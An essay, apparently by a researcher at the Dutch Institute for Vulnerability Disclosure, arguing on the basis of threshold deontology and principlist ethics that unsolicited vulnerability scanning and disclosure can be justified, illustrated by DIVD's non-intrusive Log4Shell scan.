I often send emails to people I’ve never met, about systems they didn’t know were vulnerable, warning them about risks they never asked me to find. Often, they’re surprised. Mostly grateful. Occasionally hostile.
I can understand the discomfort. On the surface, without more in-depth knowledge, it can feel intrusive. Who asked me to scan their infrastructure? Who gave me permission to notify them about something they didn’t request? I’ve come to realize that in cybersecurity, waiting for consent isn’t always an ethical luxury we can afford. Sometimes, when a vulnerability threatens publicly accessible systems, the consequences of inaction quickly outweigh the social comfort of protocol.
Ethics of Vulnerability Disclosure
At the Dutch Institute for Vulnerability Disclosure, I work in a team that operates in that uncomfortable space between respecting boundaries and preventing harm. It’s not a line we walk casually, and one I’ve learned to approach with both caution and conviction. That’s why, at DIVD, we rely on a shared Code of Conduct (CoC). This CoC is derived from a policy that was published by the Dutch Public Prosecutor in 2020, which describes the circumstances under which computer hacking will be considered ethical and exempt from prosecution. This policy is based on years of debate and legal jurisprudence and has served the Dutch hacker community greatly up until now. The questions it provides to determine whether or not an action is ethical are as follows:
- Was the action taken in the context of a significant public interest?
- Was the conduct proportionate (i.e., did the suspect not go further than necessary to achieve their objective)?
- Was the requirement of subsidiarity met (i.e., were there no less intrusive means available to achieve the intended objective)?
The DIVD CoC guides our decisions to make sure we do not cross any ethical boundaries. This can get knotty quite quickly, as we attempt to locate everyone worldwide that may be vulnerable to a particular security vulnerability. Therefore we have to make well-thought-through decisions when it comes to worldwide vulnerability scans: we have to be sure that we do not intrude further than necessary and that our way of scanning is the least impactful one.
I’ve found myself to be increasingly exacting about this. If a scan doesn’t meet the ethical standards we’ve committed to at DIVD, it’s not uncommon to argue against executing it–even if that means walking away from a serious case. That may seem cautious, but it raises a deeper ethical question: When is a vulnerability severe enough that inaction becomes the more problematic choice?
This post argues that the ethical frameworks implicitly used by DIVD, particularly threshold deontology, provide a defensible basis for more intrusive forms of unsolicited vulnerability disclosure when the public interest is at stake.
When inaction becomes the problem
Ethics in the computer security landscape have always been a topic of discussion. Recently, this discussion seems to have picked up in the academic world around the three leading frameworks and their respective ideologies:
- Consequentialism: Actions are morally right if it leads to the best overall outcomes or consequences. The use of consequentialism in this article mostly resembles utilitarianism, which is a type of consequentialism that focuses on the well-being of people.
- Deontology: Actions are morally right if it follows a set of moral rules or duties, regardless of the outcome.
- Virtue Ethics: Actions are morally right if it reflects the character and virtues of a good or morally exemplary person.
While equally important, this post does not focus on virtue ethics. The challenge we face in Coordinated Vulnerability Disclosure is not about judging moral character. It’s about operationalizing structured processes, making ethically defensible decisions under pressure, and balancing duties with consequences. These are domains where rules and outcomes matter more directly than personal virtue.
This is confirmed by various studies in the academic landscape such as The Menlo Report and the (more recent) study on Computer Security Trolley Problems by Kohno et al. These studies emphasize the importance of consequentialism and deontology where they intentionally leave virtue ethics out of scope. In contrast, studies of cybercrime — where intent, personal responsibility, and moral development are central — often lean more heavily on virtue ethics.
The tension between doing what’s right according to principle and doing what’s necessary to prevent harm lies at the center of many dilemmas in computer security. Deontology and consequentialism are often seen as opposites that lead to different outcomes when applied to the same case studies, leading these case studies to be seen as moral dilemmas. For this reason, one may realise that an absolutist approach to either of these frameworks may not be sufficient in practice when the intent is preventing harm. The Stanford Encyclopedia of Philosophy emphasizes this limitation by describing a balance through what is known as threshold deontology. Threshold deontology begins with a commitment to deontological principles such as minimizing intrusion and acting transparently. However, it recognizes that these rules may need to be overridden when the potential harm of inaction crosses a critical threshold. In other words:
We follow the rules, until not following them becomes the more ethical choice.
Threshold deontology doesn’t abandon principles. It does, however, ask us to honor them until the consequences of strict adherence become morally unacceptable, to then act with caution for a societal cause.
Principles in practice
But how would we know when that threshold is actually crossed? Threshold deontology provides us with the ‘philosophical permission’ to override a duty, but it doesn’t say when exactly that override is justified. This is where the principlist framework can provide some guidance. Instead of relying on a single guiding rule, it asks us to weigh multiple ethical principles that often come into tension in practice. This helps us to assess not just whether an action is justified, but also why and what ethical trade-offs we are accepting in the process.
In 2021, Formosa et al. proposed a principlist framework for cybersecurity that is composed of the following five principles:
- Beneficence: Promote well-being and prevent harm
- Non-maleficence: Avoid causing harm
- Autonomy: Respect individuals’ control over their systems and data
- Justice: Ensure fairness and equitable treatment
- Explicability: Act transparently and be accountable
Formosa’s principlist framework is derived from Beauchamp and Childress’s “Four Principles” of biomedical ethics and added a fifth principle of explicability, which is drawn from AI ethics (Floridi et al., 2018). When we’re considering something like a global vulnerability scan, these principles help us structure our ethical reasoning. DIVD’s scanning decisions are centered on the principle of beneficence: the obligation to prevent harm and promote public safety. When the potential benefit of scanning is low, for example when a vulnerability poses little risk or is unlikely to be exploited, we hold firm to the non-maleficence (avoiding harm) and autonomy (respecting consent and responsibility) principles. In such cases, we will refrain from scanning because the ethical cost outweighs the limited benefit.
However, when the potential to prevent significant harm is high, such as when a vulnerability threatens large-scale exploitation or critical infrastructure, we may override non-maleficence and autonomy in service of that benefit. This is not a decision taken lightly. It reflects a careful ethical trade-off, where the duty to protect others justifies limited, well-controlled intrusion.
How WIDE is my fingerprint?
To teach others about fingerprinting ethics, I often use a simple heuristic to assess the moral footprint of a fingerprinting technique called WIDE. WIDE stands for:
- Weaponized: Could this scanning methodology be used to (enable) harm? Or more practical: if the scanning methodology involves a public Proof of Concept, does it contain any malware that we would need to neutralize first? This reflects the principle of non-maleficence.
- Intrusive: Does this scanning methodology cross any boundaries of consent, privacy, or proportionality? Does it leave any unnecessary traces on the target system? This brings autonomy and justice into view.
- Deweaponized: Is this scanning methodology deliberately designed to reduce its exploitability? This ties to beneficence, the duty to protect.
- Ethical: Would this technique hold up under scrutiny from others? Is it proportionate and according to subsidiarity standards? Here, explicability becomes essential to ensure transparency on decisions and reasoning.
When I ask myself, “How WIDE is this fingerprint?”, I’m not answering a closed question. I’m surfacing tensions. Even techniques that appear technically harmless can become ethically problematic if used carelessly, at scale, or without transparency. WIDE isn’t a substitute for principlism, but it does help bring the principles into everyday practice. It’s a kind of ethical gut check for ethical proportionality: quick, imperfect, but useful when decisions happen fast. Of course, ethics are subjective, which is why not everyone may agree with our framing. Especially when consent is missing, ethical objections matter.
Addressing ethical objections
There are some counterarguments to unsolicited scanning, such as concerns about overreach, digital trespassing, and the potential erosion of trust in security research. In the end, if subjectivity leads to the justification of compromising on the explicability principle, ethical boundaries are allowed to shift under pressure. How do we ensure they don’t shift too far?
These are legitimate concerns. However, this is exactly why it is important to rely on structured frameworks like threshold deontology and principlism: not to escape ethical boundaries, but to make these boundaries visible, contestable, and constrained. The point isn’t that anything is allowed when societal safety is at play. It’s that sometimes, doing nothing carries a greater ethical cost than acting carefully without permission.
The public interest threshold of Log4Shell
When Log4Shell was disclosed in late 2021, it posed a severe threat to global digital infrastructure. The vulnerability affected countless systems, many of which were unknown to be using this software, and exploitation began within hours of public disclosure as it was trivial to exploit. It became clear quickly that this vulnerability didn’t just pose a theoretical risk, but a real-world crisis.
Log4J, the vulnerable software, was a logging component embedded in many other systems, making this a supply chain issue. The team at DIVD working on this case then faced a difficult question: how to responsibly notify affected organizations across the globe, many of which had no idea they were even using Log4J?
In such a high-stakes context, the threshold for ethical intervention was clearly crossed. The potential for harm was immense, as this vulnerability could lead to ransomware, data breaches, and critical infrastructure failures, disrupting society on a large scale. Because Log4J was embedded in other software rather than a standalone component, scanning was not possible without triggering the vulnerability itself. The considerations central to the WIDE heuristic helped to assess this approach: where many actors were mass-exploiting systems at random to test for the vulnerability, DIVD’s scanning methodology was deliberately deweaponized to reduce exploitability and kept as non-intrusive as possible by avoiding persistence or harmful effects.
To achieve this, DIVD created a Log4Shell exploit that triggered a single DNS request to a Canary Token from inside the vulnerable system: an approach that was harmless and, of all options, the least intrusive. It only revealed the vulnerable IP address and nothing more. The actions taken were designed to be ethical: proportionate to the risk, grounded in subsidiarity, and subject to public scrutiny. In doing so, we aimed to maximize beneficence, minimize maleficence, respect justice, and uphold explicability—even where autonomy had to be limited for the sake of public safety.
Conclusion: Trust through transparent ethics
Coordinated Vulnerability Disclosure isn’t just a technical challenge: it’s an ethical one. At DIVD, we don’t treat unsolicited scanning and disclosure as a loophole or an afterthought. We treat it as an action that requires justification, restraint, and transparency.
Threshold deontology provides us with the ethical architecture to act decisively when society is at risk. The principlist framework implicitly helps us navigate that threshold with clarity, so we’re not acting on instinct, but on structured ethical reasoning. I’m sharing this to explain how I think about the ethics behind unsolicited disclosure. Not because we see ourselves as above ethical rules at DIVD, but because we try to follow them as rigorously as possible, even when the path forward isn’t obvious.